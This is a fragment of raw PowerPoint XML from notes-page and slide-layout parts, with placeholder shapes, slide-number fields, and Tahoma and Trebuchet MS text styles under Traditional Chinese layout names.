          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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4" name="Shape 124"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Shape 125"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Shape 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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3" name="Shape 133"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="37242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35" name="Shape 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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1" name="Shape 141"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Shape 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Shape 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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02.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image0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標題投影片">
    <p:bg>
      <p:bgPr>
        <a:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect b="0" l="0" r="0" t="0"/>
          </a:stretch>
        </a:blipFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="17" name="Shape 17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Shape 18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="118626" y="476672"/>
            <a:ext cx="4105167" cy="4105167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4093635" y="1720852"/>
            <a:ext cx="7330959" cy="1171575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3752851" y="3167066"/>
            <a:ext cx="8238066" cy="827086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-114259" lvl="3" marL="1600160"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4pPr>
            <a:lvl5pPr indent="-114249" lvl="4" marL="2057349"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5pPr>
            <a:lvl6pPr indent="-114237" lvl="5" marL="2514537"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6pPr>
            <a:lvl7pPr indent="-114225" lvl="6" marL="2971726"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7pPr>
            <a:lvl8pPr indent="-114213" lvl="7" marL="3428914"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8pPr>
            <a:lvl9pPr indent="-114203" lvl="8" marL="3886103"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 21"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>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x">
  <p:cSld name="標題及直排文字">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="57" name="Shape 57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Shape 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068983" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4078025" y="-1393558"/>
            <a:ext cx="4611686" cy="10367433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-165090" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
